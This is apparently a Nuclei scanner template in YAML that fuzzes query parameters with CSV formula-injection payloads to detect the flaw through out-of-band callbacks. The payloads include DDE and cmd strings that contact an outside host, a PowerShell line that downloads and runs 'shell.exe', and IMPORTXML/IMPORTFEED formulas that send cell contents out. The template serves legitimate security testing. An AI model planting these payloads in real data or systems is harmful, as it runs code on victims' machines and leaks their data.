50 lines
1.9 KiB
YAML
50 lines
1.9 KiB
YAML
id: csv-injection
|
|
|
|
info:
|
|
name: CSV Injection Detection
|
|
author: DhiyaneshDK,ritikchaddha
|
|
severity: medium
|
|
description: |
|
|
A CSV injection detection template to identify and prevent CSV injection vulnerabilities by using various payloads that could be interpreted as formulas by spreadsheet applications.
|
|
tags: dast,csv,oast
|
|
|
|
http:
|
|
- pre-condition:
|
|
- type: dsl
|
|
dsl:
|
|
- 'method == "GET"'
|
|
|
|
payloads:
|
|
csv_fuzz:
|
|
- "class.module.classLoader.resources.context.configFile=http://{{interactsh-url}}"
|
|
- 'DDE ("cmd";"/C nslookup{{interactsh-url}}";"!A0")A0'
|
|
- "@SUM(1+9)*cmd|' /C nslookup{{interactsh-url}}'!A0"
|
|
- "=10+20+cmd|' /C nslookup{{interactsh-url}}'!A0"
|
|
- "=cmd|' /C nslookup{{interactsh-url}}'!'A1'"
|
|
- "=cmd|'/C powershell IEX(wget{{interactsh-url}}/shell.exe)'!A0"
|
|
- '=IMPORTXML(CONCAT("http://{{interactsh-url}}", CONCATENATE(A2:E2)), "//a/a10")'
|
|
- '=IMPORTFEED(CONCAT("http://{{interactsh-url}}/123.txt?v=", CONCATENATE(A2:E2)))'
|
|
- '=IMPORTHTML (CONCAT("http://{{interactsh-url}}/123.txt?v=", CONCATENATE(A2:E2)),"table",1)'
|
|
- '=IMAGE("https://{{interactsh-url}}/images/srpr/logo3w.png")'
|
|
|
|
fuzzing:
|
|
- part: query
|
|
type: replace # replaces existing parameter value with fuzz payload
|
|
mode: multiple # replaces all parameters value with fuzz payload
|
|
fuzz:
|
|
- '{{csv_fuzz}}'
|
|
|
|
matchers-condition: and
|
|
matchers:
|
|
- type: word
|
|
part: interactsh_protocol # Confirms the HTTP Interaction
|
|
words:
|
|
- "http"
|
|
|
|
- type: word
|
|
part: header
|
|
words:
|
|
- "text/csv"
|
|
- "application/csv"
|
|
- "application/vnd.ms-excel"
|
|
# digest: 490a0046304402204637711c31973ca215ff678049acd7760fb780a0ea7094bd8ad65b080710868b0220553b6b7eb287d6ac7283b9b177cc5596847c8a0bc09bfb88c4d3abc79384151e:922c64590222798bb761d5b6d8e72950 |